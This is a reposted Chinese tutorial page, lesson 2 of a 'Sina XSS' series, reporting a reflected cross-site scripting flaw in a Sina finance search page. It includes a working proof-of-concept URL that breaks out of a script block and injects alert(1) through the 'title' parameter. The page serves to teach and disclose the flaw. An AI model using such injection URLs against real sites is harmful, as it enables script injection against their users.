网站地图    收藏   

主页 > 后端 > 网站安全 >

[新浪XSS一课一练]瘦子XSS教程第2课:输出在<

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 第二课:http://www.2cto.com/Article/201301/186364.html唔。刚才找第一课的时候直接找到了这个,顺手发上来算了。反正开始都是很简单的直接输出在源文件里,无任何过滤的反射型XSS详细说明:...

第二课:http://www.2cto.com/Article/201301/186364.html
唔。刚才找第一课的时候直接找到了这个,顺手发上来算了。反正开始都是很简单的
直接输出在源文件里,无任何过滤的反射型XSS
详细说明:漏洞地址:
 
http://vip.stock.finance.sina.com.cn/q/go.php/vReport_List/kind/search/index.phtml?symbol=002698&orgname=&industry=&title=&t1=all
 
在title处随便写一串字符,然后查看源代码,以1111111111为例:
 
 
 
 
可以看到是直接输出在JS脚本之间的。加入闭合前面的,测试通过,未作任何过滤:
 
http://vip.stock.finance.sina.com.cn/q/go.php/vReport_List/kind/search/index.phtml?symbol=002698&orgname=&industry=&title=111111111%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E&t1=all
 
 
http://vip.stock.finance.sina.com.cn/q/go.php/vReport_List/kind/search/index.phtml?symbol=002698&orgname=&industry=&title=111111111%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E&t1=all
 
该问题出现在多个子站页面,请全面检查。 

 
修复方案:

U know. 
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论